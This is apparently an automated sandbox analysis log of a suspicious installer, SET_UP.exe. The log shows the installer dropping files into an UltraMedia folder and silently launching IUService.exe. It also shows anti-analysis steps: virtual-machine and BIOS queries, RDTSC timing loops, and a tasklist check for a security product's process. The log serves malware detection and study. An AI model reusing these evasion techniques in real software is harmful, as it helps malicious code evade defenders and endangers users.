                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: shfolder.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: rstrtmgr.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: textshaping.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sfc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: explorerframe.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: dlnashext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: wpdshext.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
                      Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wtsapi32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wsock32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: oleacc.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: msimg32.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: oledlg.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp | Window found: window name: TMainForm
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: SET_UP.exe | Static file information: File size 74139832 > 1048576
                      Source: Binary string: wntdll.pdbUGP source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: IUService.exe, 00000022.00000002.2339699051.00000000099FB000.00000004.00000020.00020000.00000000.sdmp, IUService.exe, 00000022.00000002.2343075426.0000000009D50000.00000004.00000800.00020000.00000000.sdmp
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.dr | Static PE information: real checksum: 0x33908a should be: 0x33ab8c
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe.0.dr | Static PE information: real checksum: 0x61312b should be: 0x807c92
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.dr | Static PE information: real checksum: 0x33908a should be: 0x33ab8c
                      Source: is-TBCRP.tmp.7.dr | Static PE information: real checksum: 0x3ca18 should be: 0x33f43
                      Source: VER7RSX5CP4YEKECQGJ84KT.exe.0.dr | Static PE information: section name: .didata
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.4.dr | Static PE information: section name: .didata
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp.6.dr | Static PE information: section name: .didata
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe File created: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe (copy)
                      Source: C:\Users\user\Desktop\SET_UP.exe File created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe File created: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\rtl120.bpl (copy)
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\maddisAsm_.bpl (copy)
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\madbasic_.bpl (copy)
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\madexcept_.bpl (copy)
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\is-RBCNP.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\is-TBCRP.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp File created: C:\Users\user\AppData\Roaming\UltraMedia\vcl120.bpl (copy)
                      Source: C:\Users\user\Desktop\SET_UP.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\Desktop\SET_UP.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Source: C:\Users\user\Desktop\SET_UP.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\SET_UP.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Process information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: C:\Users\user\Desktop\SET_UP.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\SET_UP.exe System information queried: FirmwareTableInformation
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe API/Special instruction interceptor: Address: 6BD77C44
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe RDTSC instruction interceptor: First address: 6BD7F3E1 second address: 6BD7F3FD instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-20h], eax 0x00000005 mov dword ptr [ebp-1Ch], edx 0x00000008 lea esi, dword ptr [ebp-38h] 0x0000000b xor eax, eax 0x0000000d xor ecx, ecx 0x0000000f cpuid 0x00000011 mov dword ptr [esi], eax 0x00000013 mov dword ptr [esi+04h], ebx 0x00000016 mov dword ptr [esi+08h], ecx 0x00000019 mov dword ptr [esi+0Ch], edx 0x0000001c rdtsc
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe RDTSC instruction interceptor: First address: 6BD7F3FD second address: 6BD7F3E1 instructions: 0x00000000 rdtsc 0x00000002 mov dword ptr [ebp-18h], eax 0x00000005 mov dword ptr [ebp-14h], edx 0x00000008 mov eax, dword ptr [ebp-18h] 0x0000000b sub eax, dword ptr [ebp-20h] 0x0000000e mov ecx, dword ptr [ebp-14h] 0x00000011 sbb ecx, dword ptr [ebp-1Ch] 0x00000014 add eax, dword ptr [ebp-10h] 0x00000017 adc ecx, dword ptr [ebp-0Ch] 0x0000001a mov dword ptr [ebp-10h], eax 0x0000001d mov dword ptr [ebp-0Ch], ecx 0x00000020 jmp 00007F1924B79CC5h 0x00000022 mov edx, dword ptr [ebp-04h] 0x00000025 add edx, 01h 0x00000028 mov dword ptr [ebp-04h], edx 0x0000002b cmp dword ptr [ebp-04h], 64h 0x0000002f jnl 00007F1924B79D50h 0x00000031 rdtsc
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-36S8B.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-UIAB4.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-SQ6C4.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-8TLP5.tmp\_isetup\_setup64.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-OKBGO.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-N3BQO.tmp\_isetup\_setup64.tmp
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\UltraMedia\is-TBCRP.tmp
                      Source: C:\Users\user\Desktop\SET_UP.exe TID: 6108 Thread sleep time: -180000s >= -30000s
                      Source: C:\Users\user\Desktop\SET_UP.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809
                      Source: C:\Users\user\Desktop\SET_UP.exe Key opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809
                      Source: C:\Users\user\Desktop\SET_UP.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: 34_2_5001C0CC @Sysutils@FindFirst$qqrx20System@UnicodeStringir19Sysutils@TSearchRec,@System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,@Sysutils@FindClose$qqrr19Sysutils@TSearchRec,GetLastError,34_2_5001C0CC
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: 34_2_5000C390 GetModuleHandleW,GetProcAddress,lstrcpynW,lstrcpynW,lstrcpynW,FindFirstFileW,FindClose,lstrlenW,lstrcpynW,lstrlenW,lstrcpynW,34_2_5000C390
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: 34_2_5001BB34 FindFirstFileW,FindClose,@System@Move$qqrpxvpvi,34_2_5001BB34
                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe Code function: 34_2_5001BD10 @System@@UStrToPWChar$qqrx20System@UnicodeString,FindFirstFileW,FindClose,34_2_5001BD10
                      Source: SET_UP.exe, 00000000.00000003.1876659268.000000000085A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1803136809.0000000000850000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.2091901198.000000000085B000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2099151002.000000000081C000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000003.1939252128.000000000085A000.00000004.00000020.00020000.00000000.sdmp, SET_UP.exe, 00000000.00000002.2099330277.000000000085A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000002.2126727281.000000000108D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: VER7RSX5CP4YEKECQGJ84KT.tmp, 00000005.00000002.2126727281.000000000108D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\yZZbr
                      Source: C:\Users\user\Desktop\SET_UP.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_025003C3 mov edx, dword ptr fs:[00000030h] 0_2_025003C3
                      Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_02500983 mov eax, dword ptr fs:[00000030h] 0_2_02500983
                      Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_02500FD2 mov eax, dword ptr fs:[00000030h] 0_2_02500FD2
                      Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_02500FD3 mov eax, dword ptr fs:[00000030h] 0_2_02500FD3
                      Source: C:\Users\user\Desktop\SET_UP.exe Code function: 0_2_02500D33 mov eax, dword ptr fs:[00000030h] 0_2_02500D33
                      Source: C:\Windows\System32\tasklist.exe Process token adjusted: Debug

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe NtQuerySystemInformation: Direct from: 0x57007C8B
                      Source: C:\Users\user\AppData\Local\Temp\is-MJKR8.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Process created: C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe "C:\Users\user\AppData\Local\Temp\VER7RSX5CP4YEKECQGJ84KT.exe" /VERYSILENT /NORESTART
                      Source: C:\Users\user\AppData\Local\Temp\is-L3PI6.tmp\VER7RSX5CP4YEKECQGJ84KT.tmp Process created: C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe "C:\Users\user\AppData\Roaming\UltraMedia\IUService.exe"
                      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
